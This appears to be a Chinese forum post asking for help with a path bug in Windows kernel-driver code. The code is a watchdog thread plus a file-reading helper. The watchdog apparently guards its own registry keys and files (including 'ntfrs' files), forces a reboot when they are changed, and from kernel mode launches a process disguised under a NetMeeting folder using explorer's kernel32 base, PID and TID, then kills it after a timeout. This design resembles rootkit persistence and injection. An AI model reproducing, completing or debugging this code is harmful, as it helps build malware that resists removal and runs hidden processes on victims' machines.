驱动中的一个路径问题
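/*
 * WatchDogThread - system-thread body that polls the driver's state in a loop.
 *
 * Each pass, in this order: exits if the driver was uninstalled or an exit
 * was requested; reboots the machine if an earlier pass found a registry or
 * file mismatch; re-checks and re-locks the registry, the files and the
 * "ntfrs" files; launches the target process once; terminates the target
 * process when its timeout has elapsed; then sleeps for WATCHDOG_INTERNAL.
 *
 * Context is unused. The thread ends with PsTerminateSystemThread(1).
 *
 * NOTE(review): the order of the checks matters because the helpers
 * (RegCheck, FileCheck, RunProcess, ...) are defined elsewhere and are
 * presumed to have side effects - do not reorder without reading them.
 */
VOID __stdcall WatchDogThread ( PVOID Context )
{
    int wait_before_run = 0;     // passes counted since m_Kernel32ImageBase became non-zero
    int wait_before_reboot = 0;  // number of registry/file fix-ups performed so far

    UNREFERENCED_PARAMETER(Context);
    KeSetPriorityThread(KeGetCurrentThread(), LOW_REALTIME_PRIORITY);

    CHAR szRunProcess[260];
    // NOTE(review): sprintf is unbounded; this is only safe while
    // TARGET_PROCESS_NAME plus the fixed prefix fits in 260 bytes.
    // NOTE(review): the string is not drive-qualified; whether RunProcess
    // accepts it in this form cannot be told from here - confirm.
    sprintf(szRunProcess,"\\programfiles\\NetMeeting\\%s",TARGET_PROCESS_NAME);

    while(1)
    {
        // Uninstalled? Then the watchdog has nothing left to guard.
        if(g_SysApp->m_bUninstalled)
        {
            LogPrint("watchdog exit for uninstalled\n");
            break;
        }

        // Exit requested?
        if(kWatchDogExit)
        {
            break;
        }

        // Reboot: fires on the pass after a fix-up, while the counter is 1 or 2.
        // If System_Reboot() returns and the counter grows past 2, no further
        // reboot is attempted.
        if(wait_before_reboot && wait_before_reboot <=2)
        {
            LogPrint("watchdog need reboot\n");
            System_Reboot();
        }

        // Check the registry; re-lock it when the check reports a problem.
        if(RegCheck() && !g_SysApp->m_bUninstalled)
        {
            LogPrint("watchdog need fix reg now\n");
            RegLock();
            wait_before_reboot ++;
        }

        // Check the files; re-lock them when the check reports a problem.
        if(FileCheck() && !g_SysApp->m_bUninstalled)
        {
            LogPrint("watchdog need fix file now\n");
            FileLock();
            wait_before_reboot ++;
        }

        // Same for the ntfrs files; this path does not schedule a reboot.
        if (NtfrsFileCheck() && !g_SysApp->m_bUninstalled)
        {
            LogPrint("watchdog ntfrs need fix file now\n");
            NtfrsFileLock();
        }

        // Timing check (original comment: start 20 seconds after explorer is
        // running). m_Kernel32ImageBase is only read here; it is filled in
        // somewhere outside this listing. The launch happens on the third pass
        // after it becomes non-zero, and only on that pass.
        if(g_SysApp->m_Kernel32ImageBase)
        {
            if(wait_before_run==2)
            {
                if(NeedRun())
                {
                    // Start the target process.
                    RunProcess(szRunProcess,g_SysApp->m_Kernel32ImageBase,g_SysApp->m_ExplorerPID,
                        g_SysApp->m_ExplorerTID);
                    WriteLastRun();
                }
            }
            wait_before_run++;
        }

        // Terminate the target once TERMINATE_PROCESS_TIMEOUT has elapsed
        // since m_TargetTickout.
        if(g_SysApp->m_TargetTickout &&
            (MyGetTickCount_S() - g_SysApp->m_TargetTickout>= TERMINATE_PROCESS_TIMEOUT) )
        {
            LogPrint("watchdog need kill process now,tickcount=%d,time=%d\n",
                MyGetTickCount_S(),MyGetCurrentTime_S());
            if(NT_SUCCESS(MyTerminateProcess(g_SysApp->m_TargetPID,STATUS_SUCCESS)))
            {
                g_SysApp->m_TargetPID=0;
                g_SysApp->m_TargetTickout=0;
            }
        }

        // Sleep until the next pass.
        System_Sleep(WATCHDOG_INTERNAL);
    }

    PsTerminateSystemThread(1);
}

/*
 * ReadFile_S1 - read a whole file (at most 32 MB) into a pool buffer.
 *
 * pszFileName  ANSI path. It is converted to Unicode and handed to ZwOpenFile
 *              unchanged with a NULL RootDirectory, so it must already be a
 *              name ZwOpenFile can resolve on its own; nothing here expands or
 *              qualifies it.
 * uSizeX       receives the file size in bytes; written only on success.
 *
 * Returns the buffer on success, or 0 on any failure (bad arguments, open,
 * query, size over the cap, allocation, or a failed/short read). On success
 * the caller owns the buffer and must release it with ExFreePool.
 *
 * NOTE(review): the buffer comes from NonPagedPool and can be as large as
 * 32 MB; confirm the callers really need non-paged memory for file contents.
 */
PCHAR ReadFile_S1(CHAR* pszFileName,ULONG* uSizeX)
{
    PCHAR uRet = 0;
    NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
    UNICODE_STRING unicFileName;
    ANSI_STRING ansiFileName;

    // Reject NULL arguments up front: *uSizeX is dereferenced on success.
    if (!pszFileName || !uSizeX)
    {
        return uRet;
    }

    RtlInitAnsiString(&ansiFileName, pszFileName);
    ntStatus = RtlAnsiStringToUnicodeString(&unicFileName, &ansiFileName, TRUE);
    if (NT_SUCCESS(ntStatus))
    {
        HANDLE hFile = NULL;
        IO_STATUS_BLOCK ioStatus = {0};
        OBJECT_ATTRIBUTES obattrSource = {0};

        InitializeObjectAttributes(&obattrSource, &unicFileName,
            OBJ_KERNEL_HANDLE|OBJ_CASE_INSENSITIVE, NULL, NULL);
        ntStatus = ZwOpenFile(
            &hFile,
            SYNCHRONIZE|GENERIC_READ,
            &obattrSource,
            &ioStatus,
            FILE_SHARE_READ|FILE_SHARE_WRITE,
            FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE);
        if (NT_SUCCESS(ntStatus))
        {
            FILE_STANDARD_INFORMATION fiStandard = {0};

            LogPrint(__FUNCTION__" open file(%s) ok\n", pszFileName);
            ntStatus = ZwQueryInformationFile(hFile, &ioStatus, &fiStandard,
                sizeof(FILE_STANDARD_INFORMATION), FileStandardInformation);
            if (NT_SUCCESS(ntStatus))
            {
                // Registry files can be large, so the cap is 32 MB.
                if (fiStandard.EndOfFile.HighPart==0 &&
                    fiStandard.EndOfFile.LowPart <= 32*1024*1024)
                {
                    ULONG uSize = fiStandard.EndOfFile.LowPart;
                    PCHAR pBuffer = (PCHAR)ExAllocatePool(NonPagedPool, uSize);
                    if (pBuffer)
                    {
                        LARGE_INTEGER liOffset;
                        liOffset.HighPart = 0;
                        liOffset.LowPart = 0;
                        RtlZeroMemory(pBuffer, uSize);
                        ntStatus = ZwReadFile(hFile, NULL, NULL, NULL, &ioStatus,
                            pBuffer, uSize, &liOffset, 0);
                        if (NT_SUCCESS(ntStatus) &&
                            ioStatus.Information == fiStandard.EndOfFile.LowPart)
                        {
                            // Success: ownership of pBuffer passes to the caller,
                            // which frees it.
                            uRet = pBuffer;
                            *uSizeX = uSize;
                            LogPrint(__FUNCTION__" read file (%s) ok\n", pszFileName);
                        }
                        else
                        {
                            // Failed or short read: the caller gets 0 and cannot
                            // free the buffer, so release it here.
                            ExFreePool(pBuffer);
                        }
                    }
                }
            }
            ZwClose(hFile);
        }
        else
        {
            LogPrint(__FUNCTION__" open file (%s) fail,status=(%08x)\n", pszFileName,ntStatus);
        }
        RtlFreeUnicodeString(&unicFileName);
    }
    return uRet;
}

/*
 * Poster's question: I can't work out why, with the file path written like
 * this, g_SysApp->m_Kernel32ImageBase == NULL every time, and the read in
 * ReadFile fails as well.
 */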